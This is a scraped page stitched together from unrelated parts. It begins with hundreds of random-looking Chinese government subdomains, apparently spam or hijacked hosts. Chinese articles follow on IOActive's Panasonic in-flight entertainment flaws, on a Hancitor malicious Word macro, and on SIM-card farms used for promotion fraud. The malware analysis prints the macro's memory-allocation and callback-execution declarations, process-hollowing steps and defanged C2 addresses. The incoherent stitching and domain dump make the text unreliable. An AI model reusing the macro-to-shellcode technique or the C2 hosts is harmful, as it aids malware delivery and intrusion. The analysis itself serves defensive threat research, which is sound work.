ui7hwgc3.ahsj.gov.cn
yqzqy.ymcxjsj.gov.cn
e001.fengxin.gov.cn
bwpsv.ymcxjsj.gov.cn
p6y63.dzszx.gov.cn
saudv.ymcxjsj.gov.cn
mnq3.fengxin.gov.cn
ilpqe.ymyjj.gov.cn
hwqortx1.ahsj.gov.cn
cbdbio6t.ahsj.gov.cn
pryen.ymcxjsj.gov.cn
cfdyt.ymyjj.gov.cn
vzacn.ymcxjsj.gov.cn
rxfuh.ymyjj.gov.cn
k000.fengxin.gov.cn
estuq.ymcxjsj.gov.cn
hwkqu.ymyjj.gov.cn
bzpoz.ymyjj.gov.cn
pllti.ymcxjsj.gov.cn
7f7tn8sp.ahsj.gov.cn
mzrtr.ymyjj.gov.cn
ucfwe.ymyjj.gov.cn
yaico.ymcxjsj.gov.cn
euanv.ymcxjsj.gov.cn
g84t.fengxin.gov.cn
bdetq.ymcxjsj.gov.cn
odizb.ymyjj.gov.cn
toafc.ymyjj.gov.cn
vtkad.ymyjj.gov.cn
ziqyw.www.ahsj.gov.cn
qp0q.fengxin.gov.cn
bnhxj.ymcxjsj.gov.cn
qwygz.ymyjj.gov.cn
ljy3.fengxin.gov.cn
xmkqp.ymyjj.gov.cn
uzjqd.ymyjj.gov.cn
dbckv.ymyjj.gov.cn
2gu1.fengxin.gov.cn
mpdeq.ymcxjsj.gov.cn
ivneb.ymyjj.gov.cn
hxdxv.ymyjj.gov.cn
pzpx1.dztjw.gov.cn
ynlcv.ymcxjsj.gov.cn
vmbps.ymyjj.gov.cn
jcsvg.ymyjj.gov.cn
qk97f.sxczfda.gov.cn
vyhsr.ymyjj.gov.cn
hm414.yyrkjsw.gov.cn
hem6.fengxin.gov.cn
kehbl.ymyjj.gov.cn
awmn3ia6.ahsj.gov.cn
my118.dztjw.gov.cn
y5kfr.sxczfda.gov.cn
1xtssta9.ahsj.gov.cn
kh5mm.yyrkjsw.gov.cn
hgy66.sxczfda.gov.cn
r5s68.nmgmg.gov.cn
ln9pl.nmgmg.gov.cn
t17kl.yyrkjsw.gov.cn
detwe.ymcxjsj.gov.cn
ct7zr.sxczfda.gov.cn
gz2ww.ntqx.gov.cn
x84y5.nmgmg.gov.cn
lsfrj.gaoxianfy.gov.cn
f649t.ntqx.gov.cn
f903f.gysfw.gov.cn
wxfgf.ntqx.gov.cn
km4kr.jsgycz.gov.cn
9dbrt.hbsme.gov.cn
phknh.nmgmg.gov.cn
nv8lnu3g.ahsj.gov.cn
h1xxy.hbsme.gov.cn
pz2p6.hfbh.gov.cn
48rbh.jsgycz.gov.cn
jyg49.jsgycz.gov.cn
jjmrq.hbsme.gov.cn
c7306.hbsme.gov.cn
7xrhl.hbsme.gov.cn
1n8tq.hbsme.gov.cn
x9lrh.hbsme.gov.cn
09da1.ahdzch.gov.cn
57752wu5.j13bs4.8g7.czsczj.gov.cn
96918z7m.kwm.czsczj.gov.cn
512780g4.jbnpp9.oml.czsczj.gov.cn
42891gbi.pkb.czsczj.gov.cn
582474wg.4cs.czsczj.gov.cn
xbdhj.jxipo.gov.cn
bacb1.ahdzch.gov.cn
qzd5c.hbsme.gov.cn
dxnph.hdfgj.gov.cn
87498791.aei.czsczj.gov.cn
j1dp9.hdfgj.gov.cn
ky6wb.paga.gov.cn
padlrb.tzsfda.gov.cn
5hhmt.lianshi.gov.cn
mybp.tzsfda.gov.cn
qf19d.yqztb.gov.cn
tvj6n.dlcz.gov.cn
subm402.bgxc.gov.cn
2194224.szxgtzyj.gov.cn
sk1tt.lianshi.gov.cn
jd72fbpw.ahsj.gov.cn
xrxd2.lianshi.gov.cn
7dkp.qlxc.gov.cn
jpnotrq.ahmczx.gov.cn
u6bla.paga.gov.cn
c5n53.lianshi.gov.cn
smehz.lianshi.gov.cn
ex2jp.ahzx.gov.cn
2r6sj.gaoxianfy.gov.cn
86x2h.fuxlzw.gov.cn
smtql.dlcz.gov.cn
wmoav.lianshi.gov.cn
fn9qs.yqztb.gov.cn
cfz12.dlcz.gov.cn
92599a4z.n1x.czsczj.gov.cn
8439593i.mbf.czsczj.gov.cn
rpjhrv5r.yqztb.gov.cn
twprw.fuxlzw.gov.cn
m24n2.lianshi.gov.cn
seh3e.wlcbly.gov.cn
4mf85.hfbh.gov.cn
c0h3o.wlcbly.gov.cn
p349m.yqztb.gov.cn
260279v9.4b6.czsczj.gov.cn
6568370.szxgtzyj.gov.cn
dshbm.fuxlzw.gov.cn
pbwgund0.ahsj.gov.cn
c9ql9.hfbh.gov.cn
ejxw5.qlxc.gov.cn
1295239.szxgtzyj.gov.cn
6fpq6.paga.gov.cn
t9hgpflk.ahsj.gov.cn
etbex1ae.ahsj.gov.cn
79dap.ahzx.gov.cn
86u3q.lianshi.gov.cn
qwjhqi7j.ahsj.gov.cn
mr1gr.hzls.gov.cn
crd3h.yqztb.gov.cn
8485339.jtjs.gov.cn
v7cntjy.ahhnjs.gov.cn
kunm025.bgxc.gov.cn
bjyjl.yqztb.gov.cn
w68mf.yqztb.gov.cn
4523563z.fbw.czsczj.gov.cn
633kd.jswsw.gov.cn
btdf8.yqztb.gov.cn
w9pls.jswsw.gov.cn
4729415.jtjs.gov.cn
syf6b.yyrkjsw.gov.cn
7808395.czlz.gov.cn
kxmk2.hfbh.gov.cn
i4vmrb2k.ahsj.gov.cn
rtl2w.yqztb.gov.cn
5gtsz.yqztb.gov.cn
lp392.yqztb.gov.cn
ywy7x.hfbh.gov.cn
pznx8.yqztb.gov.cn
97kd2.gyzfcg.gov.cn
69jxc.gaoxianfy.gov.cn
rfbst.paga.gov.cn
4gfyr.hfbh.gov.cn
kshgr.hfbh.gov.cn
xn26f.fuxlzw.gov.cn
qg1yr.hfbh.gov.cn
q2sy1pvi.ahsj.gov.cn
4mlbh.hfbh.gov.cn
jr9kk.paga.gov.cn
725985pi.kpf.czsczj.gov.cn
71102dbv.knv.czsczj.gov.cn
tq5d6.nmgmg.gov.cn
420d4.cztx6.songxi.gov.cn
e6qx6.ghqnd.songxi.gov.cn
7bf7m.dzszx.gov.cn
n6cyl.nmgmg.gov.cn
3wghc.dztjw.gov.cn
wr7cd.fuxlzw.gov.cn
zrq1t.qxdj.gov.cn
gbgjl.sxczfda.gov.cn
skf4k.jswsw.gov.cn
q77h.fengxin.gov.cn
6dfi.fengxin.gov.cn
4vi0.fengxin.gov.cn
fbnrqq4b.ahsj.gov.cn
nvbh1sps.ahsj.gov.cn
wfdio.ymyjj.gov.cn
ifv1.fengxin.gov.cn
gdzqqoom.ahsj.gov.cn
lfjcn.ntqx.gov.cn
cdq9j.zgzw.gov.cn
w8tf3.zgzw.gov.cn
6rrzs.zgzw.gov.cn
www.chancheng.gov.cn
nrdsc.zgzw.gov.cn
fsk3q.zgzw.gov.cn
hh6m3.zgzw.gov.cn
4bsch.zgzw.gov.cn
www.hsxjsj.gov.cn
lmtl7.yqztb.gov.cn
www.shjgtj.gov.cn
5l3db.hdfgj.gov.cn
wldcr.hdfgj.gov.cn
jbpsb.xaland.gov.cn
www.yumnutri.com.cn
scccq.hdfgj.gov.cn
qbswx.hdfgj.gov.cn
l56qw.zgzw.gov.cn
x5hdp.zgzw.gov.cn
www.haosf123999.com
j16j1.yqztb.gov.cn
8l9zw.zgzw.gov.cn
25ctm.zgzw.gov.cn
1qgs2.yqztb.gov.cn
rhymq.xaland.gov.cn
9g4cr.hdfgj.gov.cn
gwujd.xaland.gov.cn
dyjbb.xaland.gov.cn
pllky.yqztb.gov.cn
www.fujin.gov.cn
e8w8f5340.yqztb.gov.cn
s4s52.zgzw.gov.cn
zslhy.zgzw.gov.cn
5pw3z.zgzw.gov.cn
n6662.zgzw.gov.cn
291fl.zgzw.gov.cn
28iwi.lianshi.gov.cn
www.suibin.gov.cn
fq3l4.zgzw.gov.cn
79905.zjmb.gov.cn
9myn1.zgzw.gov.cn
4cl9r.yqztb.gov.cn
8kqbj.zgzw.gov.cn
gpz81.hdfgj.gov.cn
uqwyi.ahzx.gov.cn
24rmr.zgzw.gov.cn
www.sx.gov.cn
znklw.ahci.gov.cn
www.fnzx.gov.cn
zccdy.yqztb.gov.cn
j9cm1.fuxlzw.gov.cn
9q3gz.zgzw.gov.cn
fyxgm.fuxlzw.gov.cn
l7g2g.hdfgj.gov.cn
mbh93.zgzw.gov.cn
bx76m.hdfgj.gov.cn
w5mxq.hdfgj.gov.cn
3zzp7.zgzw.gov.cn
www.huaiji.gov.cn
2sgxk.hdfgj.gov.cn
www.puning.gov.cn
zwjhk.hdfgj.gov.cn
9qzx8.hdfgj.gov.cn
www.jhga.gov.cn
l30ff.geajg.songxi.gov.cn
www.xxgaw.gov.cn
84b11.gyjtjc.gov.cn
www.ahwh.gov.cn
www.wfcglw.gov.cn
www.wsj.lg.gov.cn
jn6zh.zgzw.gov.cn
dgw3l.zgzw.gov.cn
77bea.dyjtj.gov.cn

0day

又一场黑掉飞机的大戏?IOActive研究员声称可入侵松下机载娱乐系统

aircraft-hacking.jpg

在黑客Chris Roberts去年声称因入侵飞机系统被FBI逮捕之后,很长一段时间,我们都没有再听过黑掉飞机的精彩故事了。最近,IOActive研究员Ruben Santamarta披露了松下航空电子设备公司的机载娱乐系统(IFE)漏洞。据Santamarta所说,攻击者入侵IFE系统能够干扰飞机运营,盗取敏感信息。不过他也在文中提到,如果说IFE系统与飞机控制系统物理隔离,则此类攻击对于飞行安全是不会产生影响的。

不过松下航空电子这两天特别向媒体回应,他们确实在2015年接收到了Santamarta的漏洞报告,但都是一些低风险漏洞,并不能导致其IFE系统被攻击控制。松下航空电子严重质疑IOActive的研究测试,并呼吁IOActive尽快澄清。&*%这都是些什么剧情…..以下就是这名研究人员的文章编译内容:

你们就打着嘴仗吧,我们来详细看看这篇漏洞分析报告:

在IOActive的五年间,我有幸到很多地方出差访问,所以坐飞机成了我日常生活的一部分。你可能觉得这不是什么大问题,但对于一直害怕坐飞机的我来说,我经常有“恐飞”焦虑症状,在飞机一起飞时我的手心会出汗,所以,在长期的飞行途中,我总尝试着去适应,给自己找点其它事情做,比如花时间研究如何黑掉机载系统。在飞机上,我沉浸于研究飞行系统原理,所以逐渐适应了各种噪音、颠簸和震荡。在这篇文章中,我就和大家来聊聊松下航空电子设备公司研发的机载娱乐系统(In-Flight?Entertainment Systems,IFE)。

研究起因

当两年前我从华沙飞迪拜的行程中,决定试试运气捣鼓一下飞机上的IFE系统。在我点击了触摸屏幕上角的某个特定点之后,系统跳出了以下调试信息:

xxxx.jpg

img1.jpg

到达迪拜后,我在谷歌上搜索以上调试信息中出现的关键词,发现多家航空公司都公开了数以百计的该类固件更新:

img2.png

很显然,这些文件正被一直更新使用,所以从这里就可以获得部署在飞机上的最新版本固件(目前这些目录列表已不可访问,www2.airborne.aero/files4/)。

可以公开找到此类固件更新的航空公司包括:

阿联酋航空公司

法国航空公司

美联航

美国航空

斯堪的纳维亚航空

阿根廷航空

维珍航空

伊比利亚航空

新加坡航空

芬兰航空

卡塔尔航空

阿提哈德航空

IFE系统的主要组成部件

img3.png

系统控制装置(System Control Unit,SCU):一个机载认证服务器。该装置通过航空电子总线(通常为ARINC 429)接收风速、纬度、经度、高度和外界温度等信息,并显示在通过以太网连接的乘客屏幕端,以方便乘客及时了解飞行状态。

座椅显示装置(Seat Display Unit,SDU):一个线性可替换装置,嵌入式触摸屏设备,可以为乘客提供多种服务功能,如看电影、购物、电子阅读或连接互联网等。目前,SDU最新版本为安卓系统,而传统版本则为Linux系统。

img4.jpg

乘客个人控制装置(Personal Control Unit,PCU):这是一个可选的手持控制器,可以对SDU进行延长线控制,另外它还有信用卡读卡器功能。

机组人员控制面板系统:机组和乘务人员使用它进行飞行状态控制,如灯光、制动器、座椅、广播通告、机上购物和旅客广播系统(PA系统)等。

另外,松下航空电子设备公司还把机舱管理系统(CMS)和全球通讯服务系统都集成在了IFE机载娱乐系统中,方便机组人员进行操作(参考:panasonic),可以从乘务员面板系统访问CrewApp。

松下有多款航空IFE系统,早前版本为Linux系统的3000/3000i系列,现在最新版为安卓系统X系列的eFX、eX2和eX3。这些系统支持很多个性化功能,各版本之间虽然硬件有所不同,但都有相同的体系结构和部署代码。

在我现场对固件文件的分析中没有显示具体的数据加载注入方法。尽管在飞行途中,有机载互联网和卫星通讯网络,但通常,IFE系统一般都是在飞机着陆时,通过航空电子设备公司的固定WI-FI热点进行更新,像松下就是利用人力网(sneakernet)来对IFE系统进行预装内容更新。

松下IFE系统是由以下三部份前端程序组成C/S架构:

CrewApp

SeatApp

Backend

img5.png

在上述的网站中我找到了多个版本的CrewApp和SeatApp程序,甚至通过Google在另一个以.aero结尾的网站上找到了这些后台程序的公开源代码,在这些松下的代码库中,包含了其它航空公司的定制功能模块。由于其它航空公司的IFE系统都是基于松下的IFE代码框架进行了利用扩展,所以本文只针对松下IFE的某些特定功能进行研究分析。

Hacking-Airplanes-Entertainment-Systems.jpg

静态分析

在以下的静态分析中,我只是对松下IFE系统中的某个更新固件进行了逆向分析,这类固件可以从上述提到的网站中获取到。这确实有些遗憾,如果有机会对IFE全系统进行逆向分析的话,可能将会得到更多有价值的信息。

脚本

松下在程序实现中声明了自己的脚本语言,这些脚本用于从主程序中或GUI用户端进行扩展接入,它支持数十种覆盖了大多数功能的系统命令。

img7.png

对主要的二进制文件进行分析可以侧面了解的工作原理,所以让我们从#define函数开始。该脚本以逐行方式运行,在逆向分析中,当代码执行到#define声明时,它就试图跳转到sub_80C2690进行解析:

img8.png

在该函数中有五种定义类型:flash、draw、timer、value

img9.png

让我们从第一行#define代码说起,首先,读取定义名称,检查变量(绿色块内容)值是否为数字(绿色块内容):

img10.png

如果变量值不为数字,则对脚本中一系列的其它内设值进行核对比较:

img11.png

如果变量值为数字,则其匹配的名称/变量值将被添加到一个定义好的全局数组中(蓝色块内容):

img12.png

而在CMD语句中,将遍历cmd语句,调用相关程序,并传递参数:

img13.png

在这里,可以发现很多有意思的功能,如手持端读取信用卡刷卡数据程序:

img14.png

img15.png

甚至可以从读卡器(dev/ccr/)上跟踪并打印出有效的信用卡消费信息:

img16.png

还可以看到很多通用文件,如shell脚本、包含硬编码密码信息的配置文件、数据库、资源文件、代码库文件等。另外,我通过Twitter从某人手上获取了松下IFE系统的重启加载文件loadlru.h,该文件与SeatAppBase文件相同:

img17.png

在最新版本的安卓X系列IFE系统中,松下把脚本语言从old.txt模式升级为QT QML模式:

img19.png

后台架构则使用PHP,初步分析它存在漏洞:

img20.png

上面的图片属于“座位端(seat-2-seat)聊天功能,从图中你可以发现一些数据库配置文件。

漏洞验证

当然,这并不是问题的全部,另外,还存在演示信用卡绕过验证、任意文件访问和SQL注入漏洞,在以下的视频中,我将一一进行测试:

信用卡绕过验证

看不到视频点这里

任意文件访问

看不到视频点这里

SQL注入

看不到视频点这里

潜在影响

到底在什么情况下,黑客才能对IFE系统漏洞进行攻击利用呢?这没有一个标准答案,但我们可以充分发挥想像力,假设在某些条件下,脑补一下这种潜在的场景。

机载软件适航标准(DO-178B)定义了飞机系统和设备的软件的规范,IFE系统应该达到D或E级标准,松下的IFE系统也被认证为E级,这就意味着,即使整个系统出现错误,也都被认为是”毫无影响“或者”乘客不适“。

2016-12-22_141621.jpg

而我个人认为飞机数据网络应该根据数据归属分成四个区域,乘客娱乐区、乘客个人设备区、飞行信息服务区和飞行控制区。

需要物理控制的系统应该位于飞行控制区域,与乘客娱乐区分离,但通常来说,并不总是这样,为实现物理意义上的隔离,有些飞机使用光数据信号连接,而有些飞机使用电子网关模块,但只要有连接通道,我们就不能忽视这种攻击。否则,这类攻击将对飞行控制区域造成威胁,整架飞机的控制系统面临被黑风险。

因此,IFE系统可能成为一个攻击向量。在某些场景下,由于系统分离,攻击是不大可能达成的,然而,在其它情景下,因为IFE系统和飞行控制系统物理连接,存在理论攻击可行——当然这其实只是一种假设。

早在2014年的时候,IOActive已经在非航空器中成功入侵过电子网关模块,跨过乘客娱乐区、个人设备区和飞行控制系统之间的“红线”,很大程度上依赖目标飞机系统内部署的特定设备、软件和配置。

从通讯系统方面来说,入侵IFE系统意味着,攻击者能控制飞行信息通知,例如,攻击者可能会篡改乘客座椅后背上屏幕显示的内容,如飞行高度和路径,在屏幕上显示虚假航向。另外,攻击者还可以入侵CrewApp装置,控制旅客广播系统、灯光、座椅位置等,如果将这些攻击形成攻击链,恶意攻击者可能会制造出令乘客惊恐不安的场景。

获取个人信息,包括信用卡详细信息(虽然不在研究范围内),如果某些特定航空公司的飞行常客/VIP会员的后端网站配置不当,从技术上讲,个人信息获取仍然可行。

漏洞披露过程

2015年3月,我们把相关漏洞信息向松下方面作了通知,他们应该有足够的时间来研究和开发补丁。因为涉及到数十家航空公司和上百个版本软件,要完全修复漏洞是一项很难的工作。

尾声

目前,IOActive研究员Santamarta还未针对松下的质疑有任何回应。松下(Panasonic Avionics)自己的数据显示,他们已经为许多航空公司提供超8000机上娱乐与通讯系统和1300机上连接解决方案。较早的松下IFE系统基于Linux,新版X系列产品则基于Android。IFE系统的安全性当然也是相当重要的,实际上Panasonic Avionics最近才发布了漏洞奖励计划,奖金在100-10000美元之间。

相关飞机入侵大戏:去年,Chris Roberts搭乘美国联合航空,在推特发信息说,他入侵了该航空公司飞机的通信系统,还能让氧气罩掉下来。当天当他下飞机抵达纽约雪城机场后,随即被FBI带走调查。几天以后,当他试图登上飞往加州的班机时,才发现自己成了美国联合航空公司的拒绝客户,未来再也无法搭乘该公司的任何航班。

150417121532-chris-roberts-tweet-780x439.jpg

**参考来源:IOActiveSoftpediaFB小编clouds编译,转载请注明来自FreeBuf.COM?0day

【技术分享】恶意文档分析:从宏指令到Shellcode

前言?


最近,遇到的一个Word文档引起了我的注意,因为它一看就是一个恶意文档。它奇葩的地方在于,注释内容五花八门,从随机的变量名称到流行歌词,应有尽有。最重要的是,在从宏指令向机器码转移控制权的时候,它使用了一种非常罕见同时也非常酷的方法。

分析宏指令


宏指令的开头部分,创建许多指向已被Word载入内存中的DLL导出函数的指针:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
'Run?from?the?noise?of?the?street?and?the?loaded?gun??
Public?Declare?Function?whitworth?Lib?"kernel32.dll"?Alias?"VirtualAllocEx"?(castroism?As?Long,?accidence?As?Long,?ByVal?graze?As?Long,?ByVal?footstool?As?Long,?ByVal?vicariate?As?Long)?As?Long??
'Life?can?be?so?cruel??
Public?Declare?Sub?intermission?Lib?"ntdll.dll"?Alias?"RtlMoveMemory"?(septentrional?As?Any,?ByVal?ploy?As?Any,?ByVal?cinders?As?Long)??
'Every?time?you?give?yourself?away??
Public?Declare?Function?bruckenthalia?Lib?"kernel32.dll"?Alias?"EnumTimeFormatsW"?(ByVal?khartoum?As?Any,?ByVal?grinding?As?Any,?ByVal?fie?As?Any)?As?Long??
'So?run?my?baby?run?my?baby?run??
Public?Declare?Function?briefcase?Lib?"user32"?Alias?"SetParent"?(ByVal?anomalousness?As?Long,?ByVal?chewink?As?Long,?advert?As?Long)?As?Long??
'Run?my?baby?run?my?baby?run??
Public?Declare?Function?ex?Lib?"user32"?Alias?"GetUpdateRect"?(drakes?As?Long,?lubricitate?As?Long,?pelham?As?Long)?As?Boolean??
'You?can?keep?it?pure?on?the?inside??
Public?Declare?Function?charioteer?Lib?"user32"?Alias?"EndPaint"?(guttling?As?Long,?cervical?As?Long)?As?Long??
'You?can?keep?it?pure?on?the?inside??
Public?Declare?Function?gigartinaceae?Lib?"user32"?Alias?"OpenClipboard"?(enliven?As?Long)?As?Boolean??
'You?can?keep?it?pure?on?the?inside??
Public?Declare?Function?malnourished?Lib?"kernel32.dll"?Alias?"Sleep"?(subsequent?As?Long)

这里要特别注意函数指针whitworth和bruckenthalia,因为它们允许宏指令以相应的权限分配内存(VirtualAllocEx),然后跳转到分配的内存区并执行任意代码。

VirtualAllocEx的作用是显而易见的,因为宏代码使用它返回一个指向设置为RWX(读写执行权限)的内存块的指针。

EnumTimeFormatsW更加让人感兴趣,其代码如下所示:

1
2
3
4
5
BOOL?EnumTimeFormats(??
??_In_?TIMEFMT_ENUMPROC?lpTimeFmtEnumProc,
??_In_?LCID?????????????Locale,
??_In_?DWORD????????????dwFlags
);

这个宏代码可以通过第一个参数来传递指向内存中的任意函数的指针,并在返回时执行它。根据MSDN的介绍:

1
??lpTimeFmtEnumProc?[in]

指向应用程序定义的回调函数的指针。有关更多信息,请参阅EnumTimeFormatsProc。

通过跟踪宏代码的执行,我发现whitworth的返回值是一个表示内存位置的长整数,具体来说,是VirtualAllocEx返回的地址:

http://p0.qhimg.com/t0162bc74cd786b0853.png

当然,这个地址可能会有所变化,但这里whitworth返回的是115212288,转换为地址的话就是0x06DE0000。

在调用EnumTimeFormatsW并最终将控制权转移到shellcode之前,这个宏会给该地址加上一个偏移量0xE5D:

http://p7.qhimg.com/t01799f98ca4919ae24.png

在本例中,作为回调函数传递的最终值是115215965,也就是0x6DE0E5D。

下图中突出显示的是已经分配的具有RWX权限的内存段:

http://p3.qhimg.com/t016b565049dc738d56.png

这个内存块中的内容是一些看似随机的数据:

http://p0.qhimg.com/t011c7e0ebbd8206416.png

由于该回调函数使用了一个0xE5D的偏移量,所以我认为这个位置肯定有代码,那就反汇编看看吧:

http://p2.qhimg.com/t01b3ee16072e32ad7a.png

这里的断点能够帮我们弄清楚控制权从这个宏那里传过来时会发生什么情况。

Shellcode Harness


为了简化调试工作,可以将这部分内存保存到磁盘,并将其添加到shellcode harness。所谓shellcode harness,就是一个任意的可执行文件,只要它有一个节能够容下这个shellcode(大约12kb)就行了:

http://p9.qhimg.com/t01ec7cd55267dd6b8a.png

这个可执行文件(sc.exe)有一个足以容纳shellcode的.data节。所以,我们可以安全地将shellcode写入到.data节中,然后使用OllyDumpEx插件转储所做的修改,即从内存中导出程序到文件里。

最后得到的harness可执行文件的.data节如下所示:

http://p0.qhimg.com/t015469e8000e776c75.png

通过对.data节进行反汇编,可以查看哪部分会变成这个shellcode harness可执行文件的新入口点(转移控制权时,宏指令将跳转到这个位置):

http://p4.qhimg.com/t013ad9255dbfe11393.png

最后一步是修改harness可执行文件的PE头部,并确保入口点偏移量设置为0x0000CE5D。

http://p1.qhimg.com/t0100a2085868023d44.png

这样的话,我们就可以用IDA来反汇编shellcode了,以便进一步考察。

分析Shellcode


为了隐匿地加载所需的DLL并下载后续代码,shellcode代码需要解决许多棘手的问题。

这里最好将Access Violation异常从调试器传递给应用程序,因为它们会影响我们的逆向分析工作。

shellcode首先会检查进程内存空间中某处是否出现BULLSHIT。由于原始文档已经做好了相应的准备,所以这项检查自然会通过的。

它首先在ESI = 0x00001000处检查BULL,然后在ESI + 0x4处检查SHIT。

我们可以在内存空间中添加相应的内容,或者在每个CMP指令(EFL = 0x00000040)后设置零标志:

http://p4.qhimg.com/t01db419068c9e25ed4.png

此后,shellcode会加载DLL,其中包括urlmon.dll。该库中的URLDownloadToCacheFileA()函数用于下载后续代码:

http://p2.qhimg.com/t019f689e5c564cb666.png

此外,它还会检查操作系统的架构:

http://p2.qhimg.com/t01b14b07f5834239a4.png

在x64系统上,它会从%windir%\ SysWow64文件夹(32位)执行svchost.exe。在x86系统上,它将启动%windir%\ explorer.exe。

该进程看起来是用CREATE_SUSPENDED(0x00000004)标志启动的,然后调用NtUnmapViewOfSection():

http://p5.qhimg.com/t0178a1420ddb325814.png

这里貌似使用了一种称为Process Hollowing的技术。在使用这种技术的时候,会在挂起模式下启动一个普通的进程,不过该进程的代码实际上已经被攻击者的代码所替换了:

http://p8.qhimg.com/t01b689fd5b51797396.png

在本例中,shellcode将被注入到“已经掏空的”svchost.exe进程中。然后,对该线程上的下文进行相应的调整,然后唤醒该线程,这样就会执行恶意代码了:

http://p0.qhimg.com/t017d8ccbf0657d5b84.png

我们可以将调试器附加到正在运行但被挂起的svchost.exe进程上面来查找所有具有RWX权限的节。

http://p7.qhimg.com/t01212608967b14359a.png

如果我们在被掏空的进程的这个节上设置一个break-on-access断点,那么就可以分析这个shellcode的后续代码,并捕获更多的IOC了。一旦WINWORD.exe的shellcode执行完成,svchost.exe中的访问断点将在0x004020D0处被触发:

http://p1.qhimg.com/t016cc817579978f3b4.png

...然后,该进程将重新启动:)

在svchost.exe中还有许多其他有趣的东西,包括一些反调试花招和更多的C2主机。

 

IOC


家族(行为类似):

1
Hancitor?/?Chanitor

C2:

1
2
3
4
5
6
7
//?from?WINWORD.exe
hxxp://hoentoftfa.com/blt/path1.php?v=[1-9]{2}
?
//?from?svchost.exe
hxxp://hoentoftfa.com/ls5/gate.php??
hxxp://gonynamo.ru/ls5/gate.php??
hxxp://forpartinsa.ru/ls5/gate.php

用来获取外部IP的Callout :

1
hxxp://api.ipify.org

动态解析和加载的DLL:

http://p7.qhimg.com/t01df0e4977332d4826.png

值得注意字符串︰

http://p2.qhimg.com/t01da6258e676611725.png

http://p2.qhimg.com/t01f28c9339ed501c3a.png

usps85902802.doc的哈希值:

1
2
3
4
MD5:?03FD8CFB582F4AE09C2BC4E9D2172AC0??
SHA-1:?91C36066241D1C0D4574FDB9C6AA035EA486929B??
SHA-256:?45289367EA1DDC0F33E77E2499FDE0A3577A5137037F9208ED1CDDED92EE2DC2??
SSDeep:?3072:q2RxSO8YmDd3RJticBrsOmqHQvZ2YftJ+:JxoYmIO9JYF

本文由 安全客 翻译,转载请注明“转自安全客”,并附上链接。
原文链接:https://bittherapy.net/malicious-document-analysis-macro-to-shellcode/

如果此文章侵权,请留言,我们进行删除。0day

欺诈盛宴:百万黑产军团,两千万手机号,瓜分百亿蛋糕

互联网时代,创投圈火热,补贴、红包、抽奖,花式获客拉新,催生一条特殊产业链。

黑客、卡商、刷客,捆绑成一个利益共同体,形成一支人数至少百万的黑产军团。

他们手头有2千多万个手机号码,流窜在各大互联网平台,专营漏洞,一单生意,少则十万,多则上千万,分秒间薅干一家平台。

他们是互联网时代的畸形产物,但他们的存在,又有着某种必然。

各大平台开始注意到他们的存在,和安全公司联合绞杀,而刷客军团迭代技术,利用人机配合,开始属于他们的“技术革命”。

真正的攻防恶战,才刚刚开始…

01?刷客销赃

10月底,电信旗下的翼支付,在部分省份开展“新注册用户送10到15元的抵用券”的活动。

职业刷客申宏远,早早就盯上了。

“翼支付促销活动很多,各个省份的活动又不同,要盯得比较紧”,申宏远不过20出头,却是刷客榜上有名号的人物。

他打通了这条产业链上的所有关系,都曾参与其中。

“刷客只需要泡在赚客吧、羊毛党等论坛,找到一些有漏洞的活动”,而这次,翼支付再次成为目标。

他先找到专门提供手机卡的卡商,弄到上万张手机号码。

再找到作为黑客集散中心的软件平台,利用这些手机号批量操作,成功注册上万个翼支付新用户。

整个流程他轻车熟路,只花了半天时间。

注册成本是2000元,而申宏远的盈利是多少?

▲ 翼支付批量注册截图

每个新账户都收到了一条短信,账户返利一张面值10元的代金券,可进行话费充值。

也就是说,这单生意挣了近十万。

但代金券也有使用规则,需一次充值30元话费,才可抵10元。

这样的规则之下,如何将这些券变现?

申宏远依然有他的渠道,他找到一家淘宝店家,专门提供话费充值服务,转手将代金券8折卖出。

而淘宝店再以9.5折卖给买家,进行手机充值。

这条产业链环环相扣,所有的人,将翼支付的10万元利益,瓜分殆尽。

不难发现,在这条产业链之中,申宏远盈利最为可观,近8万。

申宏远每月的收益都不同,遇上双十一、春节、中秋等重大促销季节,“一天能挣几十万”,在一些淡季,每月收益十万左右。

实际上,像申宏远这样的职业刷客,全国有十几万人,他们专营各大平台的优惠活动和漏洞,也是最终赃物的处理商,每年收入轻松过百万。

而淘宝网,也是最常见的赃物消化渠道。

02?卡商养卡

刷客的背后,还有幕后推力——和运营商勾结的卡商,专注各种漏洞的黑客,都是不可缺少的参与者。

卡商程金平,养了2万张卡。

手机卡大多都来自他打通的,各大运营商的代理商。

“代理商每个月有开卡任务要求,我帮他达成任务量”,至于实名制,程金平并不当回事,“现在每张身份证名下,能开5张卡,我只需要给代理商提供身份证,他们就能把卡办下来”。

对代理商和卡商之间的这种默契合作,他们称为“双赢”。

程金平从代理商手里拿卡的成本一张15元,月租1元。

除了买卡,还有一项成本,来自“养卡”。

养卡需要专业设备,行话称为“猫池”和“卡池”,猫池需要放在卡池中,联动操作。

一套可养500张卡的成套设备,市场价格大概在一万左右。一般卡商手里都会有十几套卡池。

程金平租了一个小平房,将卡池装上后,连接电脑,装上相应的软件,就可以利用手机卡批量注册。

▲?程金平的工作室已初具规模

程金平的2万张卡,一天换一次,一个月内所有的卡都跑一圈。

在这个20多平米的隐秘小房间中,卡池轰轰运转。每天晚上他将卡一张张取下来,更换新卡——这就是他的日常,小心翼翼养卡,就像浇灌自己的摇钱树,毫不马虎。

2万张卡,前期投入总金额,大概为40多万。

而这些卡,每个月都能为他滚动近30万的收入,遇到旺季,每个月能收入近百万。

除了冒一定的风险,这简直就是一个一本万利、坐地收钱的生意。

像程金平这样的卡商,在业内只能算小规模,还有一些大卡商,手里养着几十万张卡,“每日滚金几十万”。

03?黑客集散地

在这条枝蔓盘结的产业链中,卡商只是一个体力活,在其中,还需要人来提供技术活。

有大量的黑客,在幕后鼎力相助。

黑客小C会利用平时闲暇的时间,浏览各个平台的优惠活动,专营活动的漏洞。

去年春节期间,钱宝网推出“新注册用户签到”活动,签到者会赠送抽奖机会,活动中奖几率极高。

小C用自己的手机实际操作了一遍后,发现操作步骤并不复杂,他就开发了一个小软件。

▲?小C提供的钱宝软件

除了批量注册,签到和抽奖这些简单步骤,都可通过软件操作。

黑客们开发的软件,会汇聚到一些大的软件平台——这里是黑客、卡商和刷客的集散中心,分配着各个环节的利益,使产业链有条不紊地运转。

小C将软件挂在平台上,刷客和卡商就会嗅利而来。

一位刷客利用钱宝网的软件,注册数百个账号,每日抽奖,还在朋友圈晒出自己的战果。

这些堆积如山的货物,大部分会以打折的价格再往外销售。

